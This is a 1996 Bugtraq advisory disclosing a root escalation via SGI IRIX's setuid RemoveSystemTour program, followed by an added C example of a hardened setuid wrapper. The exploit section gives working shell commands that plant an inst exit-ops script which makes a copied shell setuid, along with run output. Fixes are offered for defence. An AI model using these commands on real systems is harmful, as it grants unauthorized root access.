Bugtraq mailing list archives
(Another) vulnerability in new SGIs
From: hhui () stardot net (Tung-Hui Hu)
Date: Wed, 30 Oct 1996 15:15:30 -0500
Security vulnerability [SDN-5-sgi-systour]
30 October 1996

Desktop SGIs ship with a system tour pre-installed; it is the package "systour". After the user runs through the tour, the option is given to remove the tour from the hard disk. As the user does not have permission to run "versions(1M) remove", SGI writes a short program, called RemoveSystemTour, that is setuid and spawns a versions remove.

The problem is, of course, when a malicious user notices that the tour is still lying around on the hard disk. Since "versions remove" is merely a call to inst(1M), and inst is a very configurable program, allowing the user to specify not only logfiles and directories but also exit operation scripts, a setuid call to inst must be done with greater caution than now.

There are several ways to exploit RemoveSystemTour. Here I describe the easiest, and later on I describe other problems and fixes.

PROBLEM.   systour
AFFECTS.   SGI IRIX 5.3 and 6.2 with the systour package available.
REQUIRED.  account on server
RISK.      root compromise, denial of service, etc.

---

Exploit:

First, we set up an environment for running inst. dryrun is set to true because we are considerate environmentalists.

    $ rbase=$HOME; export rbase
    $ mkdir -p $HOME/var/inst
    $ echo "dryrun: true" > $HOME/.swmgrrc

These three lines should be very familiar to all exploitors.

    $ cp -p /bin/sh /tmp/foobar
    $ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
    $ chmod a+x $HOME/var/inst/.exitops

Now run it.

    $ /usr/lib/tour/bin/RemoveSystemTour
    Executing outstanding exit-commands from previous session ..
    Successfully completed exit-commands from previous session.
    Reading installation history
    Checking dependencies
    ERROR: Software Manager: automatic installation failed:
           New target (nothing installed) and no distribution.

---

DISCUSSION.

The easiest solution is to replace RemoveSystemTour with a binary that checks the password. However, RemoveSystemTour may not be the only way to access inst, and so these general recommendations apply:

  - inst should check UID and lock configuration options when called non-interactively from versions and with euid 0.
  - inst also has a race condition on the file /tmp/shPID0, the shell script it creates to make the appropriate directory (rbase).
  - inst should verify the variables it uses; by relying on an external shell script, environment variables, IFS, etc. can be tampered with.
  - Finally, inst will happily overwrite logfiles specified in the .swmgrrc file and creat() the shell script over anything.

---

TEMPORARY FIX.

Either remove the system tour or chmod -s the RemoveSystemTour binary.

ADDITIONAL COMMENTS.

None.

---

Tung-Hui Hu, hacker, comparative literature, Princeton Univ.
hhui () stardot net
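The post's root cause is a setuid wrapper that hands the caller's environment (rbase, HOME, IFS, the .swmgrrc lookup) straight to a privileged, highly configurable child. The following is an added example of the defensive pattern the DISCUSSION section asks for; it is not SGI's RemoveSystemTour or inst code. It pins every variable the post shows inst honoring, forwards only an allow-list of harmless caller variables with validated values, and execs a fixed command line so the caller cannot add options. The command path /usr/sbin/versions and the "versions remove systour" arguments are assumptions for illustration.

```c
/* Added example (not SGI's code): a setuid wrapper that refuses to pass
 * the caller's environment through to a privileged child. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

extern char **environ;

/* Variables the wrapper always sets itself, whatever the caller exported:
 * a user-supplied rbase or IFS is exactly how the post redirects inst. */
static const char *const pinned_env[] = {
    "PATH=/usr/sbin:/usr/bsd:/sbin:/usr/bin:/bin",
    "IFS= \t\n",
    "HOME=/",
    "rbase=/",
};
#define N_PINNED (sizeof pinned_env / sizeof pinned_env[0])

/* The only caller variables forwarded, and only if their values are clean. */
static const char *const allowed_names[] = { "TERM", "LANG" };
#define N_ALLOWED (sizeof allowed_names / sizeof allowed_names[0])

/* Reject empty, overlong, non-printable or shell-metacharacter values. */
int value_is_clean(const char *v) {
    if (*v == '\0' || strlen(v) > 64) return 0;
    for (; *v; v++) {
        unsigned char c = (unsigned char)*v;
        if (!isprint(c) || strchr(";|&<>`$\\\"' ", c)) return 0;
    }
    return 1;
}

/* Return the value of NAME in a NULL-terminated NAME=value array, or NULL. */
const char *env_lookup(char *const *env, const char *name) {
    size_t n = strlen(name);
    for (; *env; env++)
        if (strncmp(*env, name, n) == 0 && (*env)[n] == '=')
            return *env + n + 1;
    return NULL;
}

/* Build a sanitized environment from caller_env into out (capacity max,
 * counting the terminating NULL). Returns the entry count, or -1 on
 * overflow/allocation failure. Pinned entries point at the static table;
 * forwarded entries are freshly allocated. */
int build_safe_env(char *const *caller_env, char **out, size_t max) {
    size_t n = 0;
    for (size_t i = 0; i < N_PINNED; i++) {
        if (n + 1 >= max) return -1;
        out[n++] = (char *)pinned_env[i];
    }
    for (size_t i = 0; i < N_ALLOWED; i++) {
        const char *v = env_lookup(caller_env, allowed_names[i]);
        if (v == NULL || !value_is_clean(v)) continue;
        if (n + 1 >= max) return -1;
        size_t len = strlen(allowed_names[i]) + 1 + strlen(v) + 1;
        char *entry = malloc(len);
        if (entry == NULL) return -1;
        snprintf(entry, len, "%s=%s", allowed_names[i], v);
        out[n++] = entry;
    }
    out[n] = NULL;
    return (int)n;
}

int main(void) {
    /* Fixed argv: the caller cannot add inst options such as alternate
     * log files. Path and arguments are assumed for illustration. */
    char *const argv[] = { "versions", "remove", "systour", NULL };
    char *envp[16];

    if (build_safe_env(environ, envp, sizeof envp / sizeof envp[0]) < 0)
        return 1;
    umask(022);
    /* Single privileged exec point with a controlled environment. */
    execve("/usr/sbin/versions", argv, envp);
    perror("execve");
    return 1;
}
```

The pinned rbase and IFS are the two variables the post's exploit relies on; pinning them at the wrapper, rather than trusting inst to ignore them, closes the .swmgrrc and .exitops redirection regardless of how inst parses its configuration. A wrapper like this still needs the UID/password check the post recommends before it decides to exec at all.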